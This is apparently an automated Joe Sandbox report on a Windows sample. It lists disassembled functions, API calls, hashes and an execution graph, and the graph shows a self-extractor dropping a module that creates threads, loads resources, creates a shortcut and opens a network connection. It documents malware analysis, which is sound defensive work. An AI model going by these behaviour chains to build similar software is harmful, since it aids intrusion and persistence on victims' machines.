                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ??3@$ByteCharMultiWide
                                                                  • String ID:
                                                                  • API String ID: 1731127917-0
                                                                  • Opcode ID: ae4930b9035af11edc18eb83865398ea889af843cb2bb96c85f7d9ecca2ecb95
                                                                  • Instruction ID: 3903ebf3ba6088976d83fc344d3b185d6a20d7f45533e28e7dbc13297377a7b4
                                                                  • Opcode Fuzzy Hash: ae4930b9035af11edc18eb83865398ea889af843cb2bb96c85f7d9ecca2ecb95
                                                                  • Instruction Fuzzy Hash: 2831B3729041156ACB14FFA6DD81DEFB3BCEF00714B51403FF952B31E1EA38AA458658
                                                                  Function 00403F85 Relevance: 6.1, APIs: 4, Instructions: 66COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetTempPathW.KERNEL32(00000001,00000000,00000002,00000000,00406437,00000000,?,?,00404B63,?,7ZSfx%03x.cmd), ref: 00403FA8
                                                                  • GetTempPathW.KERNEL32(00000001,00000000,00000001,?,?,00404B63,?,7ZSfx%03x.cmd), ref: 00403FC5
                                                                  • wsprintfW.USER32 ref: 00403FFB
                                                                  • GetFileAttributesW.KERNEL32(?), ref: 00404016
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: PathTemp$AttributesFilewsprintf
                                                                  • String ID:
                                                                  • API String ID: 1746483863-0
                                                                  • Opcode ID: 013dbc26b67ec8e4cb6dbc59edbfaa415160c5e99e9f4e95bea1135156e91aed
                                                                  • Instruction ID: 4b01c17e8612d334da970e7aef70975a1f373095b445c13461924cc76c43a46f
                                                                  • Opcode Fuzzy Hash: 013dbc26b67ec8e4cb6dbc59edbfaa415160c5e99e9f4e95bea1135156e91aed
                                                                  • Instruction Fuzzy Hash: 1B113672100204BFCB01AF59CC85AADB7F8FF88755F50802EF905972E1DB78AA008B88
                                                                  Function 00401A85 Relevance: 6.1, APIs: 4, Instructions: 65COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CharUpperW.USER32(?,74DEE0B0,00000000,00000000,?,?,?,00403DBD,00000002), ref: 00401AC3
                                                                  • CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401ACF
                                                                  • CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401B03
                                                                  • CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401B13
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: CharUpper
                                                                  • String ID:
                                                                  • API String ID: 9403516-0
                                                                  • Opcode ID: 18230d7c19ca01b706053a4839b324d461c93759ef2237e6a4782e95e1545131
                                                                  • Instruction ID: 0ba0c8867aa888139ba8faa8f8ff432121b60ad667f2455bf366b55ac651d143
                                                                  • Opcode Fuzzy Hash: 18230d7c19ca01b706053a4839b324d461c93759ef2237e6a4782e95e1545131
                                                                  • Instruction Fuzzy Hash: 02112E34A11269ABCF108F99C8446BAB7E8FF44356B504467F881E3290D77CDE51EB64
                                                                  Function 00407FA5 Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0040690F: GetDlgItem.USER32(?,?), ref: 0040691B
                                                                    • Part of subcall function 0040692C: GetDlgItem.USER32(?,?), ref: 00406939
                                                                    • Part of subcall function 0040692C: ShowWindow.USER32(00000000,?), ref: 00406950
                                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00407FED
                                                                  • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000103), ref: 0040800D
                                                                  • GetDlgItem.USER32(?,000004B7), ref: 00408020
                                                                  • SetWindowLongW.USER32(00000000,000000FC,Function_00006F37), ref: 0040802E
                                                                    • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040803E), ref: 00407D30
                                                                    • Part of subcall function 00407D06: LoadIconW.USER32(00000000), ref: 00407D33
                                                                    • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000032), ref: 00407D43
                                                                    • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000031), ref: 00407D48
                                                                    • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040803E), ref: 00407D51
                                                                    • Part of subcall function 00407D06: LoadImageW.USER32(00000000), ref: 00407D54
                                                                    • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000001,?), ref: 00407D79
                                                                    • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000000,?), ref: 00407D89
                                                                    • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E76
                                                                    • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E92
                                                                    • Part of subcall function 004072DD: GetDlgItem.USER32(?,000004B6), ref: 004072EA
                                                                    • Part of subcall function 004072DD: SetFocus.USER32(00000000,?,?,004073B2,000004B6,?), ref: 004072F1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ItemWindow$System$HandleLoadMessageMetricsModuleSend$DirectoryFileFocusIconImageInfoLongShow
                                                                  • String ID:
                                                                  • API String ID: 2538916108-0
                                                                  • Opcode ID: a74d79fd4605bc1a7757bdbc28ebf3a23631424810f8539fda01f9cd24d05c25
                                                                  • Instruction ID: 9218ed989044434557cb474aaa53437228351995edfdd36a91d94446a14b3a18
                                                                  • Opcode Fuzzy Hash: a74d79fd4605bc1a7757bdbc28ebf3a23631424810f8539fda01f9cd24d05c25
                                                                  • Instruction Fuzzy Hash: 7D1186B1A402146BCB10BBB99D09F9EB7FDEB84B04F00446EB652E31C0D6B8DA008B54
                                                                  Function 004067ED Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SystemParametersInfoW.USER32(00000029,000001F4,?,00000000), ref: 00406814
                                                                  • GetSystemMetrics.USER32(00000031), ref: 0040683A
                                                                  • CreateFontIndirectW.GDI32(?), ref: 00406849
                                                                  • DeleteObject.GDI32(00000000), ref: 00406878
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: System$CreateDeleteFontIndirectInfoMetricsObjectParameters
                                                                  • String ID:
                                                                  • API String ID: 1900162674-0
                                                                  • Opcode ID: 5f8418ac61918c0235adc1083e46979a63813a21cc36a9cb80778b220a455722
                                                                  • Instruction ID: e152b01862f646c7a4819b14062263d5307cf72e2961abd6127bac75ebed32e6
                                                                  • Opcode Fuzzy Hash: 5f8418ac61918c0235adc1083e46979a63813a21cc36a9cb80778b220a455722
                                                                  • Instruction Fuzzy Hash: A9116376A00205AFDB10DF94DC88FEAB7B8EB08300F0180AAED06A7291DB74DE54CF54
                                                                  Function 0040748A Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 0040749F
                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 004074B8
                                                                  • SHGetPathFromIDListW.SHELL32(00000000,00000000), ref: 004074D4
                                                                  • SHGetMalloc.SHELL32(00000000), ref: 004074FE
                                                                    • Part of subcall function 004072DD: GetDlgItem.USER32(?,000004B6), ref: 004072EA
                                                                    • Part of subcall function 004072DD: SetFocus.USER32(00000000,?,?,004073B2,000004B6,?), ref: 004072F1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: BrowseFocusFolderFromItemListMallocPathmemset
                                                                  • String ID:
                                                                  • API String ID: 1557639607-0
                                                                  • Opcode ID: a8285b8de4733da597857d8c27af206edc1c0a360700d70dd9a7d2ed45ada19f
                                                                  • Instruction ID: 30b51fec80d89fd3ac1614d0428bedaa433d1aa4d1a510c8e8bcd0531de43efe
                                                                  • Opcode Fuzzy Hash: a8285b8de4733da597857d8c27af206edc1c0a360700d70dd9a7d2ed45ada19f
                                                                  • Instruction Fuzzy Hash: 43112171A00114ABDB10EBA5DD48BDE77FCAB84715F1040A9E505E7280DB78EF05CB75
                                                                  Function 004027C7 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,00000000), ref: 004027F8
                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00402801
                                                                    • Part of subcall function 0040112B: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 0040114B
                                                                    • Part of subcall function 0040112B: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 00401171
                                                                  • ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000001,00000001,00000000,?,00000000,00000000,00000000), ref: 00402819
                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 00402839
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ??3@$EnvironmentExpandStrings$??2@
                                                                  • String ID:
                                                                  • API String ID: 612612615-0
                                                                  • Opcode ID: 1bf054f2ccdc3be335b048ff77a64ac4bdb67295ffe3aca3d2c9ccbf2cc91127
                                                                  • Instruction ID: 71972da321696c7643696fa2d61077c4bfdb6251f9c85b9dd911fab2e4c9aeed
                                                                  • Opcode Fuzzy Hash: 1bf054f2ccdc3be335b048ff77a64ac4bdb67295ffe3aca3d2c9ccbf2cc91127
                                                                  • Instruction Fuzzy Hash: EF017976D00118BADB04AB55DD41DDEB7BCEF48714B10417BF901B31D1EB746A4086A8
                                                                  Function 00403AB1 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00402D7D: GetWindowTextLengthW.USER32(?), ref: 00402D8E
                                                                    • Part of subcall function 00402D7D: GetWindowTextW.USER32(00402E07,00000000,00000001), ref: 00402DAB
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,00413550,00413558), ref: 00403AFD
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00413550,00413558), ref: 00403B05
                                                                  • SetWindowTextW.USER32(?,?), ref: 00403B12
                                                                  • ??3@YAXPAX@Z.MSVCRT(?), ref: 00403B1D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ??3@TextWindow$Length
                                                                  • String ID:
                                                                  • API String ID: 2308334395-0
                                                                  • Opcode ID: 8119ca7b33955cbac21e87e4fe12ba773d40effc5d925a3b7e480b00d6a2293b
                                                                  • Instruction ID: 2cc122b1f520d7f8021a056a959bf32eecafdcf33a956e59961b1277582e5a57
                                                                  • Opcode Fuzzy Hash: 8119ca7b33955cbac21e87e4fe12ba773d40effc5d925a3b7e480b00d6a2293b
                                                                  • Instruction Fuzzy Hash: 2EF0FF32D0410DBACF01FBA5DD46CDE7B79EF04705B10406BF501720A1EA79AB559B98
                                                                  Function 0040702A Relevance: 6.0, APIs: 4, Instructions: 34windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetObjectW.GDI32(?,0000005C,?), ref: 00407045
                                                                  • CreateFontIndirectW.GDI32(?), ref: 0040705B
                                                                  • GetDlgItem.USER32(?,000004B5), ref: 0040706F
                                                                  • SendMessageW.USER32(00000000,00000030,00000000,00000000), ref: 0040707B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFontIndirectItemMessageObjectSend
                                                                  • String ID:
                                                                  • API String ID: 2001801573-0
                                                                  • Opcode ID: 78def116b4819d627590729c5baad135a5410a8d7e74f17ad4cec64f2c4de15c
                                                                  • Instruction ID: 5c236ef126686a3da9008926c30106754acf3bfa0ff8e01310dffb34f405da6a
                                                                  • Opcode Fuzzy Hash: 78def116b4819d627590729c5baad135a5410a8d7e74f17ad4cec64f2c4de15c
                                                                  • Instruction Fuzzy Hash: 35F05475900704ABDB209BA4DC09F8B7BFCAB48B01F048139BD51E11D4D7B4E5018B19
                                                                  Function 00401BA3 Relevance: 6.0, APIs: 4, Instructions: 28COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetParent.USER32(?), ref: 00401BA8
                                                                  • GetWindowRect.USER32(?,?), ref: 00401BC1
                                                                  • ScreenToClient.USER32(00000000,?), ref: 00401BCF
                                                                  • ScreenToClient.USER32(00000000,?), ref: 00401BD6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ClientScreen$ParentRectWindow
                                                                  • String ID:
                                                                  • API String ID: 2099118873-0
                                                                  • Opcode ID: ede60c7992125a9d10b8f8c06fbaeb3be6251aeef84f0c1b655461571a46cee2
                                                                  • Instruction ID: 3a6f634f9500a9f0e676680e31990ed58166cb62974d534a535afb1fb6b8d00a
                                                                  • Opcode Fuzzy Hash: ede60c7992125a9d10b8f8c06fbaeb3be6251aeef84f0c1b655461571a46cee2
                                                                  • Instruction Fuzzy Hash: 09E04F722052116BCB10AFA5AC88C8BBF6DDFC5723700447AF941A2220D7709D109A61
                                                                  Function 00403C63 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: _wtol
                                                                  • String ID: GUIFlags$[G@
                                                                  • API String ID: 2131799477-2126219683
                                                                  • Opcode ID: f402b0c85aba1d66b07b6addbe7eda3b1a8910d5e18cf18c534464033b9959d4
                                                                  • Instruction ID: b6302b9691b8fcfec91ee3c39af82f4337802e9cb3a6f407b943601295de961a
                                                                  • Opcode Fuzzy Hash: f402b0c85aba1d66b07b6addbe7eda3b1a8910d5e18cf18c534464033b9959d4
                                                                  • Instruction Fuzzy Hash: 6DF03C3611C1635AFB342E0994187B6AA9CEB05793FE4443BE9C3F12D0C37C8E82825D
                                                                  Function 00402F10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetEnvironmentVariableW.KERNEL32(?O@,?,00000001,004177A0,00000000,00417794,?,?,00404F3F,?,?,?,?,?), ref: 00402F26
                                                                  • GetEnvironmentVariableW.KERNEL32(?,00000000,?,00000001,00000002,?,?,00404F3F,?,?,?,?,?), ref: 00402F52
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: EnvironmentVariable
                                                                  • String ID: ?O@
                                                                  • API String ID: 1431749950-3511380453
                                                                  • Opcode ID: 0f0cab1a5fe64df75075e876fd7e6a607817ca224d69030a73e0dc08c334b9f4
                                                                  • Instruction ID: 315e17eccb05daff3adc91fa9074d23558c2207180d60d9b2b56ce26dbf77fcb
                                                                  • Opcode Fuzzy Hash: 0f0cab1a5fe64df75075e876fd7e6a607817ca224d69030a73e0dc08c334b9f4
                                                                  • Instruction Fuzzy Hash: 24F06272200118BFDB00AFA9DC458AEB7EDEF88764B51402BF904D72A1D7B4AD008B98

                                                                  Execution Graph

                                                                  Execution Coverage:5.4%
                                                                  Dynamic/Decrypted Code Coverage:31.9%
                                                                  Signature Coverage:9.1%
                                                                  Total number of Nodes:2000
                                                                  Total number of Limit Nodes:82
                                                                  execution_graph 108569 6c87a6a7 108620 6c87a1b0 GetModuleFileNameA 108569->108620 108573 6c87a6e8 108633 6c878cd0 108573->108633 108577 6c87a713 108578 6c858670 24 API calls 108577->108578 108579 6c87a71b 108578->108579 108582 6c87a738 108579->108582 108658 6c8794d0 108579->108658 108584 6c87a836 CreateThread 108582->108584 108682 6c879cd0 108582->108682 108583 6c87a1b0 28 API calls 108587 6c87a764 108583->108587 108585 6c87a8df 108584->108585 108586 6c87a885 WaitForSingleObject 108584->108586 109672 6c879730 Sleep 108584->109672 108717 6c87a390 GetModuleFileNameA 108585->108717 108586->108585 108590 6c87a8aa 108586->108590 108592 6c8656c0 27 API calls 108587->108592 108589 6c87a7ee 108596 6c87a7fe CreateThread 108589->108596 108597 6c858670 24 API calls 108590->108597 108594 6c87a78e 108592->108594 108599 6c858670 24 API calls 108594->108599 108596->108584 109673 6c879ba0 108596->109673 108600 6c87a8c6 108597->108600 108601 6c87a79e 108599->108601 108669 6c9d61ae 108601->108669 108607 6c87a989 108609 6c858670 24 API calls 108607->108609 108610 6c87a999 108609->108610 108740 6c8795b0 GetModuleHandleA 108610->108740 108612 6c87a9d5 CreateThread 108747 6c8780b0 WSAStartup 108612->108747 109686 6c872110 108612->109686 108621 6c857b10 27 API calls 108620->108621 108622 6c87a229 108621->108622 108623 6c87a2a0 108622->108623 108624 6c87a25c 108622->108624 108626 6c857b10 27 API calls 108623->108626 108783 6c878030 27 API calls 108624->108783 108627 6c87a289 108626->108627 108628 6c858670 24 API calls 108627->108628 108629 6c87a2d7 108628->108629 108630 6c8656c0 108629->108630 108784 6c8589f0 108630->108784 108632 6c865706 108632->108573 108793 6c8659c0 108633->108793 108635 6c878d4b 108636 6c878d5e 108635->108636 108637 6c878d8c 108635->108637 108638 6c857b10 27 API calls 108636->108638 108797 6c878f20 108637->108797 108640 6c878d78 108638->108640 108820 6c865d80 108640->108820 108641 6c878da5 108802 6c8790a0 108641->108802 108644 6c878ebf 108655 6c858670 108644->108655 108645 6c878dd9 108808 6c85c110 108645->108808 108647 6c878df7 108812 6c8792a0 108647->108812 108649 6c878e3c 108650 6c857b10 27 API calls 108649->108650 108652 6c878e5c 108649->108652 108650->108652 108653 6c878e8d 108652->108653 108817 6c865aa0 108652->108817 108654 6c858670 24 API calls 108653->108654 108654->108640 109396 6c859590 108655->109396 108657 6c858684 108657->108577 108659 6c857b10 27 API calls 108658->108659 108660 6c879530 108659->108660 109401 6c861100 108660->109401 108662 6c879552 109458 6c85f760 108662->109458 108664 6c87956b 108665 6c858670 24 API calls 108664->108665 108666 6c879576 108665->108666 108667 6c858670 24 API calls 108666->108667 108668 6c87957e 108667->108668 108668->108583 108670 6c9d61bc 108669->108670 108671 6c9d61c6 108669->108671 108683 6c857b10 27 API calls 108682->108683 108684 6c879d3b 108683->108684 109613 6c873ae0 108684->109613 108686 6c879d63 108687 6c858670 24 API calls 108686->108687 108688 6c879d70 108687->108688 108689 6c879d78 GetFileAttributesA 108688->108689 108690 6c879d99 SHGetFolderPathA 108689->108690 108716 6c879d8d 108689->108716 108691 6c879de0 108690->108691 108690->108716 108693 6c857b10 27 API calls 108691->108693 108692 6c858670 24 API calls 108694 6c87a0d5 108692->108694 108695 6c879e05 108693->108695 108694->108589 108696 6c8656c0 27 API calls 108695->108696 108697 6c879e33 108696->108697 108698 6c873ae0 27 API calls 108697->108698 108699 6c879e60 108698->108699 108700 6c8656c0 27 API calls 108699->108700 108701 6c879e8b 108700->108701 108702 6c858670 24 API calls 108701->108702 108703 6c879e9b 108702->108703 108704 6c858670 24 API calls 108703->108704 108705 6c879ea6 108704->108705 108706 6c858670 24 API calls 108705->108706 108707 6c879eb1 108706->108707 108708 6c879ebc GetFileAttributesA 108707->108708 108709 6c879ed1 108708->108709 108710 6c879edd CoInitialize 108708->108710 108712 6c858670 24 API calls 108709->108712 109616 6c855fb0 108710->109616 108712->108716 108713 6c879efd CoCreateInstance 108714 6c879f42 108713->108714 108715 6c87a09f CoUninitialize 108713->108715 108714->108715 108715->108709 108716->108692 108718 6c857b10 27 API calls 108717->108718 108719 6c87a409 108718->108719 108721 6c87a46b 108719->108721 109621 6c878030 27 API calls 108719->109621 108722 6c858670 24 API calls 108721->108722 108723 6c87a4ae 108722->108723 108724 6c8720a0 GetModuleFileNameA 108723->108724 108725 6c857b10 27 API calls 108724->108725 108726 6c8720f0 108725->108726 108727 6c857b10 108726->108727 108728 6c857b57 108727->108728 109622 6c857c00 108728->109622 108730 6c857b8c 108731 6c87a570 108730->108731 108732 6c859440 108731->108732 108733 6c87a59f GetModuleHandleA 108732->108733 108734 6c87a5c8 std::bad_exception::bad_exception 108733->108734 108736 6c87a5b8 108733->108736 108735 6c87a5e8 GetModuleFileNameA 108734->108735 108737 6c87a61e 108735->108737 108739 6c87a63e 108735->108739 108736->108607 108738 6c857b10 27 API calls 108737->108738 108738->108739 108739->108736 109630 6c9c3f20 108740->109630 108743 6c87963a LoadResource SizeofResource LockResource 108744 6c8796f3 ~refcount_ptr 108743->108744 108745 6c87969c Mailbox _Yarn 108743->108745 108744->108612 109632 6c8786b0 108745->109632 108748 6c878132 std::bad_exception::bad_exception 108747->108748 109659 6c877e50 108748->109659 108751 6c85f760 24 API calls 108752 6c878199 108751->108752 108753 6c858670 24 API calls 108752->108753 108754 6c8781a4 108753->108754 108755 6c877e50 27 API calls 108754->108755 108756 6c8781bf 108755->108756 108757 6c85f760 24 API calls 108756->108757 108758 6c8781d9 108757->108758 108759 6c858670 24 API calls 108758->108759 108760 6c8781e4 108759->108760 108761 6c878200 getaddrinfo 108760->108761 108762 6c87823f WSACleanup 108761->108762 108768 6c878256 108761->108768 109666 6c9cf76f 44 API calls CallUnexpected 108762->109666 108764 6c8782a7 socket 108764->108768 108765 6c8782a2 freeaddrinfo 108768->108764 108768->108765 108770 6c87833e connect 108768->108770 108770->108765 108783->108627 108785 6c858a0d 108784->108785 108788 6c858b60 108785->108788 108787 6c858a27 108787->108632 108789 6c858c60 108788->108789 108791 6c858bcf 108788->108791 108792 6c858d70 27 API calls 108789->108792 108791->108787 108792->108791 108794 6c8659df 108793->108794 108823 6c86b2d0 108794->108823 108796 6c865a27 108796->108635 109157 6c86b8d0 108797->109157 108799 6c878f74 108801 6c878fcc 108799->108801 109161 6c87bcf0 108799->109161 108801->108641 108803 